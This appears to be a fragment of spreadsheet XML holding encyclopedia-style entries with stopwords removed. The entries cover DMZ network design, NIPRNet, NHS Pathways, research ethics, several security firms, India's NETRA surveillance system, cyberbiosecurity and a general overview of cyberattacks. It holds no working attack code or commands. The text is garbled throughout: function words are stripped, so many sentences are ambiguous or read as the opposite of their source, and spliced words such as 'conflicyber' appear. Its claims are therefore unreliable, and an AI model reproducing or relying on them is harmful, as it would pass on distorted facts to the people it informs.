internet. mail server inside passes incoming mail secured/internal mail servers. also handles outgoing mail. security, compliance legal standards hipaa, monitoring reasons, business environment, enterprises install proxy server within dmz. this following benefits: obliges internal users (usually employees) proxy server internet access. reduced internet access bandwidth requirements since content cached proxy server. simplifies recording monitoring user activities. centralized content filtering.a reverse proxy server, like proxy server, intermediary, used around. instead providing service internal users wanting access external network, provides indirect access external network (usually internet) internal resources. example, back office application access, email system, could provided external users read emails outside company) remote user would direct access email server (only reverse proxy server physically access internal email server). this extra layer security particularly recommended internal resources need accessed outside, worth noting design still allows remote (and potentially malicious) users talk internal resources help proxy. since proxy functions relay non-trusted network internal resource: also forward malicious traffic (e.g. application level exploits) towards internal network; therefore proxy's attack detection filtering capabilities crucial preventing external attackers exploiting vulnerabilities present internal resources exposed proxy. usually reverse proxy mechanism provided using application layer firewall focuses specific shape contents traffic rather controlling access specific ports packet filter firewall would do), reverse proxy usually good substitute well thought design rely continuous signature updates updated attack vectors. architecture there many different ways design network dmz. basic methods single firewall, also known three legged model, dual firewalls, also known back back. these architectures expanded create complex architectures depending network requirements. single firewall single firewall least network interfaces used create network architecture containing dmz. external network formed firewall first network interface, internal network formed second network interface, formed third network interface. firewall becomes single point failure network must able handle traffic going well internal network. zones usually marked colors -for example, purple lan, green dmz, internet (with often another color used wireless zones). dual firewall secure approach, according colton fralick, firewalls create dmz. first firewall (also called "front-end" "perimeter" firewall) must configured allow traffic destined only. second firewall (also called "back-end" "internal" firewall) allows traffic internal network. this setup considered secure since devices would need compromised. there even protection firewalls provided different vendors, makes less likely devices suffer security vulnerabilities. example security hole found exist vendor's system less likely occur one. drawbacks architecture costly, purchase, manage. practice using different firewalls different vendors sometimes described component "defense depth" security strategy. host some home routers refer host, which—in many cases—is actually misnomer. home router host single address (e.g., address) internal network traffic sent otherwise forwarded hosts. definition, true (demilitarized zone), since router alone separate host internal network. that host able connect hosts internal network, whereas hosts within real prevented connecting internal network firewall separates unless firewall permits connection. firewall allow host internal network first requests connection host within dmz. host provides none security advantages subnet provides often used easy method forwarding ports another firewall device. this tactic (establishing host) also used systems interact properly normal firewalling rules nat. this forwarding rule formulated ahead time (varying port numbers example, opposed fixed number fixed range). this also used network protocols router programming handle (6in4 tunnels prototypical examples). also bastion host screened subnet science network architecture high performance computing references further reading solutionbase: strengthen network defenses using shinder techrepublic. eric maiwald. network security: beginner's guide. second edition. mcgraw-hill/osborne, 2003. internet firewalls: frequently asked questions, compiled matt curtin, marcus ranum paul robertson</t>
  </si>
  <si>
    <t>NIPRNet</t>
  </si>
  <si>
    <t>non-classified internet protocol (ip) router network (niprnet) network used exchange unclassified information, including information subject controls distribution, among private network's users. niprnet also provides users access internet. united states department defense's three main networks. others include siprnet jwics. history niprnet composed internet protocol routers owned united states department defense (dod). created 1980s managed defense information systems agency (disa) supersede earlier milnet. security improvements year leading 2010 niprnet grown faster u.s. department defense monitor. spent million 2010 current state niprnet, effort analyze expansion, identify unauthorized users, suspected quietly joined network. niprnet survey, uses ipsonar software developed lumeta corporation, also looked weakness security caused network configuration. department defense made major effort year leading 2010, improve network security. pentagon announced requesting $2.3 billion 2012 budget bolster network security within defense department strengthen ties counterparts department homeland security. alternative names siprnet niprnet referred colloquially sippernet nippernet simply sipper nipper), respectively. also classified website siprnet ripr joint worldwide intelligence communications system (jwics) intellipedia protective distribution system nato cronos references external links disa army defense knowledge online</t>
  </si>
  <si>
    <t>NHS Pathways</t>
  </si>
  <si>
    <t>pathways triage software utilised national health service england triage public telephone calls medical care emergency medical services calls trusts five ambulance services country. emergency capacity, replaced advanced medical priority dispatch system trusts, non-emergency telephone triage found many medical care triage systems, 111.the system, born desire reduce unnecessary call-outs emergency services, reduce instances patients rebounding care providers repeated re-triage, designed triage health problem refer appropriate service either within without service undertaking triage. with attached capacity management system, pathways designed factor services available local patient supplying care provision. essence, intention health care problem triaged emergency non-emergency directed possible health care provider without need second triage referral, delay. mechanism triage many triage systems, pathways operates diagnosis exclusion, excluding conditions based triage questions developed senior clinicians digital. upon arriving illness injury cannot excluded, system directs patient appropriate level care condition. theoretically, patients receive higher level care actual condition warrants occasion, never receive lower level. unlike previous triage systems, emergency capacity pathways lead patient doctor, nurse, emergency department, home-care advice dispositions, whereas previous systems often merely various levels ambulance response. lack care providers area also highlights gaps services review. current usage pathways currently utilised eight eleven english ambulance services: north east ambulance service south east coast ambulance service west midlands ambulance service isle wight trust south central ambulance service north west ambulance service yorkshire ambulance service london ambulance service 111in addition, providers including: vocare, practice plus group (ppg), ic24, healthcare huc, pathways system assess calls england. history pathways evolved following reports national audit office (nao) inconsistency 'hear treat' statistics across ambulance services united kingdom. june 2011 approved make substantial savings improve efficiency ambulance services." development intended coincide integrated growth non-emergency healthcare system 111. october 2011, department health announced plans extend pathways across 2013 replace direct. role emergency medicience received media coverage focused hope would reduce unnecessary ambulance dispatches improvement existing ampds criteria-based dispatch systems. north east ambulance service, already using pathways, declared reduced call outs 2,000 month. using attached capacity management system (cms) pathways analyse medical services local caller, thus direct patient nearby minor injury units doctor's surgeries depending presenting condition. launched pathways example adult female laceration upon triaged pathways directed minor injuries unit mile home identified function pathways suitable. theory, patient medical condition contact telephone-based medical care provider (999, 111, out-of-hours directed care pathway, ambulance, doctor, nurse, emergency department, using system. january 2021 reported digital healthcare soared 2020 number calls pathways dealt rising 2.5% period year august 2020 seeing highest increase 17.7% august 2019. june 2020 reported pathways made 300,000 referrals since launch algorithms updated reflect need patients covid-19 symptoms referred covid clinical assessment service. this turn also ensured patients non-covid-19 symptoms, clinically appropriate, could referred community pharmacist consultation service (cpcs). august 2020, emerged nhs111 online experienced record usage million users visiting nhs111 online february august 2020, covid pandemic. newly introduced dashboard, based volume triages going pathways, proved valuable indicator getting early warnings potential local outbreaks. nhs111 online became reliable trusted source government guidance pandemic, also connecting public additional digital services related coronavirus, issue isolation notes sending text messages support patients managing illness home. october 2021, dealt almost 20,000 suspected cardiac arrest patients, emerged pathways well equipped identify cardiac arrests escalating priority ambulance response, well instructing supporting members public administering successfully, considerably increasing patient’s chance survival. notes references "nhs pathways integrating urgent emergency care" (press release). national health service clinical directorate. 2011. retrieved june 2013.</t>
  </si>
  <si>
    <t>Return of results</t>
  </si>
  <si>
    <t>return results concept research ethics describes extent duty researcher reveal explain results research research participant. return results particularly discussed field biobanks, typical case would many members community donate biobank specimens medical research. course research, especially human genomics research, scientists discover personal health information could influence behavior specimen donors information. different cases, arguments revealing study information participants many cases morally correct choice self-evident. example situation following example shows possible outcomes trying fulfill return results genomic research.a healthy person donates biological specimen agrees specimen associated data genome-wide association study. goal study would something unrelated donor's identified interests, example, build base fundamental research study rare disease. sample stored years. later researcher gets access data sample, data de-identified researcher data without invading research participant's privacy. this researcher finds donor's specimen displays biomarkers indicate person risk developing genetic disease. individual's personal physician genetic information, standard care might take action. outcome scenario could researcher contacts specimen donor, gives information, donor informed happy this. another outcome situation researcher medical doctor, case, usual person receive diagnosis outside doctor-patient relationship. even participant understands information diagnosis, confusing know getting health information unknown person. even researcher ought tell specimen donor development, case researcher means contact participant time passed since sample collected means contacting participant unknown research protections place prevent researchers knowing identity donor donor's sake right privacy. donor, whatever reason, even want know genetic problem, find information unwelcome tracked informed. addition stated problems, problems arise. return individual results there debate whether researchers give participants research studies individual results based contribution study. some perspectives researchers give individuals information others researchers generally offer this. arguments favor proponents offering individual results often cite "respect persons" ethical basis practice. following reasons support argument: studies shown participants want results; returning results demonstrating respect donors' contributions research; research results, especially genetic data, valuable information individuals; participants access information increases personal autonomy. aside medical health, access information social meaning participants solidifying cultural identity, membership ethnic group, identifying non-paternity event. arguments definition research major argument offering research results. research treatment guidelines including belmont report distinguish "clinical practice" goal improving individual's health "research" goal developing general knowledge.researchers must take care allow participants confused whether participating research receiving personal clinical care; researcher study participant's personal health advisor. study participants often tendency perceive researchers physicians research personal treatment designed benefit them. when participants information researchers interpret health advice.the nature results problematic well. research data often comprehensible participants would want take health action based unsubstantiated misinterpretations data. alternate uses term "return results" usually refers return study data personal community interest participants. research result products besides data, development commercially valuable product research goal. when term "return results" used, usually refer return results research (such profit generated) explanation research showed. debate non-informational study results returned discussed "ownership results" headings. issues relating return results there universally recognized authoritative policy whether researchers return results research participants, views practices researchers field vary widely. research september 2011 national human genome research institute awarded grants totaling us$5.7 million study ethics relating return results. references further reading nisen, rockhold, (2013). "access patient-level data glaxosmithkline clinical trials" (pdf). england journal medicine. (5): 475–478. doi:10.1056/nejmsr1302541. hdl:10161/11001. pmid 23902490. zarin, (2013). "participant-level data frontier trial transparency". england journal medicine. (5): 468–469. doi:10.1056/nejme1307268. pmid 23902488. lauerman, john january 2014). "harvard scientists research subjects should data". bloomberg.com. retrieved january 2014.</t>
  </si>
  <si>
    <t>TokenEx</t>
  </si>
  <si>
    <t>tokenex cloud-based data security company, headquartered tulsa, oklahoma. company founded 2010 alex pezold. provides services coupling tokenization (data security), encryption, management ensuring secure data. specializes tokenization (data security) sensitive customer data. pezold said tokenization translate million credit card numbers million tokens,” short time. world vision international clients using tokenex platform.on february 2018, company announced partnership cloud constellation design space-based data security solution layers tokenization secure storage space securing customers' sensitive data.it 2016 metro award recognized metro 50’s fastest growing privately held company greater oklahoma city chamber. also oklahoma center advancement science technology security references</t>
  </si>
  <si>
    <t>DNS.com LLC</t>
  </si>
  <si>
    <t>dns.com american domain name system service website evolved brand. march 2014 re-branded dnsbycomodo.com. history website, founded 1991, administrated kimball (ceo), brian smith (cto), sean stafford (coo) eric radtke (cmo). 2010, comwired inc. acquired site began offering enterprise service february 2011, dns.com acquired cybersecurity company comodo. also hosting service anycast external links official website business profile businessweek references</t>
  </si>
  <si>
    <t>NCP Engineering</t>
  </si>
  <si>
    <t>engineering (styled 'ncp engineering') nuremberg-based company producing software remote access, industrial internet things security information security. ncp's products virtual private network (vpn) technologies like encryption, personal firewalls electronic certificates public infrastructure (pki) secure data communication.ncp made ipsec client compatible windows windows ios, linux android operating systems. name abbreviation "network communications products". supplement "engineering" describes company produces software in-house data processing. history engineering founded nuremberg, germany 1986. company produces software secure data communication internet, networks) 3g/4g wireless lans. core ncp's business provisioning secure communication connections stationary mobile end-devices well affiliate branch networks company's headquarters.in 2007, partnered watchguard technologies.in january 2010, ncp-e established north american affiliate, engineering, inc. february 2010, engineering awarded patent 8811397 "system method data communication user terminal gateway network node".ncp engineering involved esukom project development real-time security solution protects corporate networks using integrated security solutions based unified metadata format since 2010.as simu project partner (security information event management small smes), engineering focused optimizing security corporate networks.after many years working together, 2017 engineering juniper networks intensified collaboration technology partnership. references</t>
  </si>
  <si>
    <t>NCC Group</t>
  </si>
  <si>
    <t>group (lse: ncc) information assurance firm headquartered manchester, united kingdom. service areas cover software escrow verification, cyber security consulting managed services. group claims 15,000 clients worldwide. company listed london stock exchange constituent ftse index. history group formed june 1999, national computing centre sold commercial divisions existing management team supported private equity firm ventures. this company named services renamed group 2000. 2000, cotton hired finance director subsequently took responsibility group's escrow division. 2003 secondary management buyout became chief executive group ltd. this valued group million supported barclays private equity.on july 2004 group admitted trading aim, flotation raising £38.1 million expenses. after rapid expansion, july 2007 group made move london stock exchange's main market.in august 2020 training materials, group, founding member cyber security certification body crest, including practical examination “cheat sheets” crest examinations leaked github dropbox platforms. leaked documents described internal training procedures involving “cloned examination rigs” offered step step walkthroughs crest examinations. breach exam integrity crest suspended practical examinations statement said "will appointing independent investigative panel.” acquisitions group expanded mixture organic growth acquisitions: .secure 2012 group announced investment million months wholly owned subsidiary, artemis internet. this used apply .secure generic level domain (gtld) develop associated security programme. application subsequently abandoned .secure assigned different applicant. .trust 2014 group acquired right operate generic level domain (gtld) .trust deutsche post. references external links official website</t>
  </si>
  <si>
    <t>DNSimple</t>
  </si>
  <si>
    <t>dnsimple managed domain name server service operated aetrion d/b/a dnsimple, offers hosting, domain registration, certificates. dnsimple also icann-accredited domain registrar. history dnsimple founded 2010 anthony eden darrin eden. first public version service launched july 2010 offered managed dns. domain registration added later, september 2010, partnership enom. november 2011, dnsimple announced proprietary record type called alias provides cname-like record apex domain.in september 2012, dnsimple acquired robodomain, inc. provided domain management service (robodomain) whois software service (robowhois). simone carletti, robodomain, inc. founder joined dnsimple first official full-time employee dnsimple. robodomain discontinued 2013.in december 2013, dnsimple migrated customers unicast anycast network composed points presence.in december 2014, dnsimple fell victim major distributed denial-of-service (ddos) attack across entire network, resulted several hours downtime. part mitigation plans, company decided review implementation secondary support released begin 2015. company dnsimple company, however company completely decentralized team members remote workers. company's service actively used let's encrypt's challenge validation seen download numbers docker hub. dnsimple enterprise dnsimple enterprise provides secure domain provider, trustworthy hosting, excellent domain management. addition, enterprise-level management service dnsimple provides solutions offered domain registrars. ddos defense includes two-factor authentication enforcement (2fa) dnssec. also, multiple points presence worldwide, ddos (distributed denial service) defense, secondary dns. references external links official website official blog dnsimple github</t>
  </si>
  <si>
    <t>DQS</t>
  </si>
  <si>
    <t>holding gmbh based frankfurt main holding company worldwide group. group provides assessments certifications management systems processes type. history founded 1985 berlin first german certification body. founding partners, (german society quality) (german institute standardization), mainly promote german economy. foundation overlapped publication first drafts 9000 series standards, also include important quality standard worldwide today: 9001. 1986 became first certification body germany issue certificate according 9001.after merger management systems solutions (mss) division american product certification body underwriters laboratories inc. march 2008, dqs-ul group currently world's largest system certification bodies. since june 2015 company changed name group. corporate organization holding gmbh offices countries. group currently 20,000 certified customers across almost industries approximately 65,000 certified locations countries.the concern employs people commands 2,500 auditors 2019 (annual average). among largest companies within group inc. (usa), brasil ltd., japan inc., medizinprodukte gmbh (medical devices), (sustainability) gmbh (all germany).dqs gmbh germany headquartered frankfurt main local offices hamburg, gmbh largest subsidiary holding gmbh. service spectrum group’s services include cross-industry assessments customer industry-specific requirements certifications national international standards specifications. 9001 (quality) 14001 (environment) 45001 (workplace safety) iatf 16949 (automotive) 22301 (business continuity) 27001 (information security) 28000 (security management system supply chain) 37001 (anti-bribery management systems) 50001 (energy management) 13485 (medical device certification) iso/ts 22163:2017/iris (rail sector) 9100:2018 series (aerospace) international featured standard (ifs) fssc 22000 griin addition, group also offers assessments areas risk management systems, sustainability, education, data privacy, business excellence, health social services, integrated management systems. network charter full member international certification network iqnet association founded 1990. main objective currently approx. 40-member global network mutual recognition certificates issued member companies. sied sadek, managing director middle east, pointed interview share dqs's expertise field reporting dqs's understanding necessity sensitive regional cultural context, development process islamic reporting initiative (iri). references external links 2008 merger management systems solutions division underwriters laboratories inc. website dqs. website website chinese.</t>
  </si>
  <si>
    <t>DRDO NETRA</t>
  </si>
  <si>
    <t>netra (networking traffic analysis) software network developed india's centre artificial intelligence robotics (cair), defence research development organisation (drdo) laboratory, used intelligence bureau, india's domestic intelligence agency, research analysis wing (r&amp;aw), country's external intelligence agency intercept analyse internet traffic using pre-defined filters. program tested smaller scales various national security agencies, reported deployed nationwide 2022. development history security agencies looking build system could monitor internet traffic real time basis rapidly escalating threat posed terrorist criminal elements using data communication, brought service providers like blackberry, skype gmail focus enforcement agencies.two systems designed, drdo's centre artificial intelligence robotics, national technical research organisation (ntro), india's technical intelligence agency. inter-ministerial committee staffed members ministry home affairs, intelligence bureau, department telecom, department national investigation agency formed evaluate systems select internet monitoring system.ntro's system designed help paladion, international private company netra designed team scientists cair. committee selected cair's netra multiple issues ntro's system. serious security reservations involvement international private company sensitive project, doubts ntro's ability operate, maintain upgrade system independently. also, raw, tested ntro's system happy ntro solution reported crashed frequently. committee favoured netra indigenous solution involving government scientists personnel component solution outsourced outside agency. agency testing netra, also pleased performance. committee observed cair continuously investing keep fast-changing technologies, unlike ntro. system first demonstrated premises sify technologies capture entire internet traffic passing probes. capabilities netra analyse voice traffic passing software skype google talk, intercept messages keywords 'attack', 'bomb', 'blast' 'kill' real-time enormous number tweets, status updates, emails, instant messaging transcripts, internet calls, blogs, forums even images generated internet obtain desired intelligence. system analyses large amount international data crosses internet networks india. three security agencies, include raw, allotted maximum gigabytes (gb) node totaling 1000 nodes storing intercepted internet traffic (so, 1000 nodes 300gb 300,000gb total space initially decided up.), extra node assigned remaining enforcement agencies. netra internet scanning coordination centre system monitor internet, similar ones used usa, china, iran many nations. initially, r&amp;aw current user monitoring system, 2013, ministry home affairs recommended second netra system domestic enforcement agencies. this done intelligence gathered external intelligence agency largely irrelevant enforcement agencies, could handle data. note department telecommunications (dot) stated system provide access multiple security agencies.netra's deployment discussed 2013 apex inter-ministerial group headed dot, included representative cabinet secretariat, ministry home affairs, drdo, cair, intelligence bureau, c-dot computer emergency response team (cert-in). awards recognition drdo scientist athithan cair team awarded 'agni award excellence self-reliance 2008' developing netra. team comprised scientists indian institute science, g.ravindra rahul kharge. also mass surveillance india natgrid, indian national intelligence grid. central monitoring system telecom enforcement resource monitoring national internet exchange india references</t>
  </si>
  <si>
    <t>Cyberbiosecurity</t>
  </si>
  <si>
    <t>cyberbiosecurity emerging field intersection cybersecurity biosecurity. objective cyberbiosecurity described addressing "the potential actual malicious destruction, misuse, exploitation valuable information, processes, material interface life sciences digital worlds". cyberbiosecurity part system measures collectively "safeguard bioeconomy", objective described national academies sciences, engineering medicine united states. cyberbiosecurity threats cyberbiosecurity threats becoming increasingly important technological progress continues accelerate fields artificial intelligence, automation, synthetic biology. moreover, pace progress fields accelerating, also becoming increasingly integrated, leading growing overlap generating security vulnerabilities. many potential risks future progress bioengineering identified researchers fall within bounds cyberbiosecurity, instance, cyberattacks exploit bio-automation malicious purposes. against background, cyberbiosecurity measures becoming increasingly important prevent protect misuse innovations life sciences, including reduce proliferation risk biological weapons. recent years, growing amount research characterizing cyberbiosecurity threats, including conducting surveys cyberbiosecurity risk perceptions biotech sector, offering first recommendations measures prevent protect threats.in light covid-19 pandemic, research focused cyberbiosecurity implications pandemic. references</t>
  </si>
  <si>
    <t>National Information Governance Board for Health and Social Care</t>
  </si>
  <si>
    <t>national information governance board health social care (nigb) advised united kingdom government information governance 2008 2013. history board established section health social care 2008, effect october 2008, range advisory functions relating information governance. from january 2009, nigb also gained functions section 2006 previously held patient information advisory group (piag) abolition. these functions advise secretary state health powers aside common duty confidentiality england, identifiable patient information needed consent practicable. from april 2013, nigb's functions monitoring improving information governance practice transferred care quality commission, established national information governance committee oversee work. functions relating section 2006 (access people's personal confidential information research purposes) transferred health research authority's confidentiality advisory group. terms reference functions nigb (excerpted legislation) were: monitor practice followed relevant bodies relation processing relevant information; keep secretary state health, bodies secretary state health designate direction, informed practice followed relevant bodies relation processing relevant information; publish guidance practice followed relation processing relevant information; advise secretary state health particular matters relating processing relevant information person; advise persons process relevant information matters relating processing relevant information secretary state health time time designate direction. definition “relevant information” legislation covers patient information, information obtained generated course provision health service, information obtained generated course exercise local social services authority england adult social services functions. ethics confidentiality committee some areas nigb functions delegated nigb's ethics confidentiality committee (ecc). these functions primarily related applications identifiable patient information without consent, specific circumstances within bounds section 2006. these applications, considered piag nigb, passed health research authority's confidentiality advisory group (cag) april 2013. care record development board nigb also replaced care record development board (crdb), closed september 2007. nigb subsequently maintained care record guarantee originally developed crdb developed companion social care record guarantee. members nigb consisted chair, number public members appointed appointments commission, number representative members appointed secretary state health range stakeholder organisations. representatives several stakeholder organisations served corresponding advisers nigb typically attended meetings. regular observers meetings included representatives information commissioner's office devolved administrations. consisted chair number members, appointed nigb advice appointments commission approved independent assessor. chair members also nigb members. between june 2011 march 2013 dame fiona caldicott chair nigb, succeeding harry cayton chaired nigb since inception. geography members nigb widely distributed nationally attended meetings nigb office. since september 2011, based skipton house, london se1. nigb's staff team predominantly based office. abolition result health social care 2012 nigb abolished effect april 2013. functions delegated respect research transferred health research authority. commissioning board, later known england, responsible providing advice guidance bodies. other functions transferred national information governance committee hosted care quality commission. references external links official website (archived 2013)</t>
  </si>
  <si>
    <t>Cyberbaiting</t>
  </si>
  <si>
    <t>cyberbaiting recent trend students provoking teachers posting mobile phone recordings extreme reactions online embarrass teachers. this even escalate teachers losing jobs. cyberbaiting form bullying. norton online family report information according norton report, five teachers know another teacher experienced cyberbaiting. teachers stated friends students social networks exposes risk cyberbaiting. continue "friend" students. teachers school code conduct teachers students communicate social media. possible causes cyber experts caused powerful, technical tools available impulsive teens. perceptions teens internet also factor since whatever done internet anonymous. another factor mentality nobody feels responsible done pack. north carolina teacher many years experience teaching classroom mentoring teachers says teachers vulnerable others. believes teachers need establish control. prevention article verywell provides ideas prevent cyberbaiting:teachers develop rules camera phones classroom. teachers discuss digital citizenship digital expectations classes beginning year. teachers "friend" students online. teachers stay current classroom management strategies. teachers brainstorming sessions address cyberbaiting. teachers prepared cyberbaiting incident case happen. also cyberbullying digital citizen references external links cyberbaiting rise teacher tantrums posted youtube what cyberbaiting prevent norton online family report identifies issues "cyberbaiting" overspending</t>
  </si>
  <si>
    <t>Cyberattack</t>
  </si>
  <si>
    <t>cyberattack offensive maneuver targets computer information systems, computer networks, infrastructures, personal computer devices. attacker person process attempts access data, functions, restricted areas system without authorization, potentially malicious intent. depending context, cyberattacks part cyber warfare cyberterrorism. cyberattack employed sovereign states, individuals, groups, society organisations originate anonymous source. product facilitates cyberattack sometimes called cyber weapon. cyberattack steal, alter, destroy specified target hacking susceptible system. cyberattacks range installing spyware personal computer attempting destroy infrastructure entire nations. legal experts seeking limit term incidents causing physical damage, distinguishing routine data breaches broader hacking activities.cyberattacks become increasingly sophisticated dangerous.user behavior analytics security information event management (siem) used help prevent attacks. definitions since late 1980s cyberattacks evolved several times innovations information technology vectors committing cybercrimes. recent years, scale robustness cyberattacks increased rapidly, observed world economic forum 2018 report: "offensive cyber capabilities developing rapidly ability deal hostile incidents".in 2000, internet engineering task force defined attack 2828 assault system security derives intelligent threat, i.e., intelligent deliberate attempt (especially sense method technique) evade security services violate security policy system.cnss instruction 4009 dated april 2010 committee national security systems united states america defines attack kind malicious activity attempts collect, disrupt, deny, degrade, destroy information system resources information itself.the increasing dependency modern society information computer networks (both private public sectors, including military) terms like cyber attack cyber warfare. cnss instruction 4009 define cyber attack attack, cyberspace, targets enterprise’s cyberspace purpose disrupting, disabling, destroying, maliciously controlling computing environment/infrastructure; destroying integrity data stealing controlled information.as cars begin adopt technology, cyber attacks becoming security threat automobiles. prevalence first months 2017, billion data records stolen impacted cyber attacks, ransomware payments reached us$2 billion, double 2016. 2020, increase remote work effect covid-19 global pandemic, cybersecurity statistics reveal huge increase hacked breached data. worldwide information security market forecast reach $170.4 billion 2022. cyber warfare cyberterrorism cyberwarfare utilizes techniques defending attacking information computer networks inhabit cyberspace, often prolonged cyber campaign series related campaigns. denies opponent's ability employing technological instruments attack opponent's critical computer systems. cyberterrorism, hand, "the computer network tools shut critical national infrastructures (such energy, transportation, government operations) coerce intimidate government civilian population". that means result cyberwarfare cyberterrorism same, damage critical infrastructures computer systems linked together within confines cyberspace. financial crime expert veit buetterlin explained organizations, including state actors, cannot finance trade imposed sanctions, conduct cyber attacks banks generate funds. factors three factors contribute cyberattacks launched state individual: fear factor, spectacularity factor, vulnerability factor. spectacularity factor spectacularity factor measure actual damage achieved attack, meaning attack creates direct losses (usual loss availability loss income) garners negative publicity. february 2000, denial service attack severely reduced traffic many major sites, including amazon, buy.com, cnn, ebay (the attack continued affect still sites next day). amazon reportedly estimated loss business $600,000. vulnerability factor vulnerability factor exploits vulnerable organization government establishment cyberattacks. organizations without maintenance systems might running servers vulnerable updated systems. organization vulnerable denial service attack government establishment defaced page. computer network attack disrupts integrity authenticity data, usually malicious code alters program logic controls data, leading errors output. professional hackers cyberterrorists professional hackers, either working employed government agencies military, find computer systems vulnerabilities lacking appropriate security software. once vulnerabilities found, infect systems malicious code remotely control system computer sending commands view content disrupt computers. there needs pre-existing system flaw within computer antivirus protection faulty system configuration viral code work. many professional hackers promote cyber terrorists, financial gain reasons. this means rules govern actions. cyberterrorists premeditated plans attacks born rage. they need develop plans step-by-step acquire appropriate software carry attack. they usually political agendas, targeting political structures. cyberterrorists hackers political motivation, attacks impact political structure corruption destruction. they also target civilians, civilian interests, civilian installations. previously stated, cyberterrorists attack persons property cause enough harm generate fear. types attack attack active passive. "active attack" attempts alter system resources affect operation. "passive attack" attempts learn make information system affect system resources (e.g., wiretapping).an attack perpetrated insider outside organization; "inside attack" attack initiated entity inside security perimeter "insider"), i.e., entity authorized access system resources uses approved granted authorization. "outside attack" initiated outside perimeter, unauthorized illegitimate user system "outsider"). internet, potential outside attackers range amateur pranksters organized criminals, international terrorists, hostile governments. resource (both physical logical), called asset, vulnerabilities exploited threat agent threat action. result, confidentiality, integrity availability resources compromised. potentially, damage extend resources addition initially identified vulnerable, including resources organization, resources involved parties (customers, suppliers). so-called triad basis information security. attack active attempts alter system resources affect operation: compromises integrity availability. "passive attack" attempts learn make information system affect system resources: compromises confidentiality. threat potential violation security, exists circumstance, capability, action event could breach security cause harm. that threat possible danger might exploit vulnerability. threat either "intentional" (i.e., intelligent; e.g., individual cracker criminal organization) "accidental" (e.g., possibility computer malfunctioning, possibility "act god" earthquake, fire, tornado).a policies concerned information security management, information security management systems (isms), developed manage, according risk management principles, countermeasures order accomplish security strategy following rules regulations applicable country.an attack lead security incident i.e. security event involves security violation. words, security-relevant system event system's security policy disobeyed otherwise breached. overall picture represents risk factors risk scenario.an organization take steps detect, classify manage security incidents. first logical step incident response plan eventually computer emergency response team. order detect attacks, number countermeasures organizational, procedural, technical levels. computer emergency response team, information technology security audit intrusion detection system examples these.an attack usually perpetrated someone intentions: black hatted attacks falls category, perform penetration testing organization information system find foreseen controls place. attacks classified according origin: i.e. conducted using computers: last case called distributed attack. botnets used conduct distributed attacks. other classifications according procedures used type vulnerabilities exploited: attacks concentrated network mechanisms host features. some attacks physical: i.e. theft damage computers equipment. others attempts force changes logic used computers network protocols order achieve unforeseen original designer) result useful attacker. software used logical attacks computers called malware. following partial short list attacks: passive computer network surveillance network wiretapping fiber tapping port scan idle scan host keystroke logging data scraping backdoor active denial-of-service attack ddos distributed denial service attack attempt made hacker block access server website connected internet. this achieved using multiple computerized systems, overloads target system requests, making incapable responding query. spoofing mixed threat attack network man-in-the-middle man-in-the-browser poisoning ping flood ping death smurf attack host buffer overflow heap overflow stack overflow format string attack modality supply chain attack social engineering exploit detail, number techniques utilize cyberattacks variety ways administer individuals establishments broader scale. attacks broken categories: syntactic attacks semantic attacks. syntactic attacks straightforward; considered malicious software includes viruses, worms, trojan horses. syntactic attacks viruses virus self-replicating program attach another program file order reproduce. virus hide unlikely locations memory computer system attach whatever file sees execute code. also change digital footprint time replicates making harder track computer. worms worm need another file program copy itself; self-sustaining running program. worms replicate network using protocols. latest incarnation worms make known vulnerabilities systems penetrate, execute code, replicate systems code worm infected systems less hours. much larger scale, worms designed industrial espionage monitor collect server traffic activities transmit back creator. trojan horses trojan horse designed perform legitimate tasks also performs unknown unwanted activity. basis many viruses worms installing onto computer keyboard loggers backdoor software. commercial sense, trojans imbedded trial versions software gather additional intelligence target without person even knowing happening. three likely attack individual establishment emails, browsers, chat clients, remote software, updates. semantic attacks semantic attack modification dissemination correct incorrect information. information modified could done without computers even though opportunities found using them. someone wrong direction cover tracks, dissemination incorrect information utilized. cyberattacks countries within cyberwarfare, individual must recognize state actors involved committing cyberattacks another. predominant players discussed age-old comparison east versus west, china's cyber capabilities compared united states' capabilities. there many state non-state actors involved cyberwarfare, russia, iran, iraq, qaeda; since china u.s. leading foreground cyberwarfare capabilities, states actors discussed. 2013, akamai technologies reported indonesia toppled china portion percent cyber attacks, high increase percent portion previous quarter. china percent percent. percent attacks came asia pacific region. indonesia dominated attacking ports percent. azerbaijan hackers azerbaijan armenia actively participated cyberwarfare part nagorno-karabakh conflicyber warfare disputed region nagorno-karabakh, azerbaijani hackers targeting armenian websites posting ilham aliyev's statements. canada "chinese state-sponsored actor" attacked research facility canada 2011. unknown hackers attacked canada's foreign ministry 2022. china china's people's liberation army (pla) developed strategy called "integrated network electronic warfare" guides computer network operations cyberwarfare tools. this strategy helps link together network warfare tools electronic warfare weapons opponent's information systems conflict. they believe fundamentals achieving success seizing control opponent's information flow establishing information dominance. science military science campaigns identify enemy logistics systems networks highest priority cyberattacks states cyberwarfare must mark start campaign, used properly, enable overall operational success. focusing attacking opponent's infrastructure disrupt transmissions processes information dictate decision-making operations, would secure cyber dominance adversary. predominant techniques would utilized conflict gain upper hand follows, would strike electronic jammers, electronic deception, suppression techniques interrupt transfer processes information. they would launch virus attacks hacking techniques sabotage information processes, hopes destroying enemy information platforms facilities. pla's science campaigns noted role cyberwarfare create windows opportunity forces operate without detection lowered risk counterattack exploiting enemy's periods "blindness", "deafness" "paralysis" created cyberattacks. that main focal points cyberwarfare, able weaken enemy full extent possible physical offensive higher percentage success. conducts regular training exercises variety environments emphasizing cyberwarfare tactics techniques countering tactics employed them. faculty research focusing designs rootkit usage detection kylin operating system helps train individuals' cyberwarfare techniques. china perceives cyber warfare deterrent nuclear weapons, possessing ability greater precision, leaving fewer casualties, allowing long-ranged attacks. march 2021, microsoft released emergency security update patch four security vulnerabilities used hafnium, chinese nation-state-sponsored hacking group compromised least 30,000 public private microsoft exchange servers. estonia 2007 cyberattacks estonia series cyberattacks began april 2007 targeted websites estonian organizations, including estonian parliament, banks, ministries, newspapers, broadcasters, amid country's disagreement russia relocation bronze soldier tallinn, elaborate soviet-era grave marker, well graves tallinn. attacks triggered number military organizations around world reconsider importance network security modern military doctrine. direct result cyberattacks creation nato cooperative cyber defence centre excellence tallinn. ethiopia extension bilateral dispute ethiopia egypt grand ethiopian renaissance dam, ethiopian government websites hacked egypt-based hackers june 2020. india pakistan there instances india pakistan involved cyberspace conflicts, started 1990s. earlier cyber attacks came known early 1999. since then, india pakistan engaged long-term dispute kashmir moved cyberspace. historical accounts indicated country's hackers repeatedly involved attacking other's computing database system. number attacks grown yearly: 1999, 2000, august 2001. 2010, indian hackers laid cyber attack least government database websites going name "indian cyber army". 2013, 